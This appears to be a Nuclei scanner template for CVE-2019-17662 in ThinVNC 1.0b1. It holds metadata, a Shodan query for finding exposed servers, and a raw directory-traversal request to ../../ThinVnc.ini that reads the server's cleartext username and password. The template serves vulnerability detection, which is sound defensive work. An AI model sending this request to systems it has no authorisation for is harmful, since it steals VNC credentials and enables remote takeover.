id: CVE-2019-17662 info: name: ThinVNC 1.0b1 - Authentication Bypass author: DhiyaneshDK severity: critical description: | ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector. remediation: | Upgrade to a patched version of ThinVNC or implement additional authentication mechanisms. reference: - http://packetstormsecurity.com/files/154896/ThinVNC-1.0b1-Authentication-Bypass.html - https://github.com/bewest/thinvnc/issues/5 - https://redteamzone.com/ThinVNC/ - https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.py classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-17662 cwe-id: CWE-22 epss-score: 0.52352 epss-percentile: 0.97243 cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cybelsoft product: thinvnc shodan-query: http.favicon.hash:-1414548363 tags: packetstorm,cve,cve2019,auth-bypass,thinvnc,intrusive http: - raw: - | GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - "User=" - "Password=" condition: and - type: word part: header words: - "application/binary" - type: status status: - 200 # digest: 4b0a00483046022100a173eb2e6fea90b3a075740734fa3c7cc44fee1379273fd1565419dd4ca613bb022100d6873c95b74fb4a5c643e11337f2adf012af415953693119b01a3d9cdbacade1:922c64590222798bb761d5b6d8e72950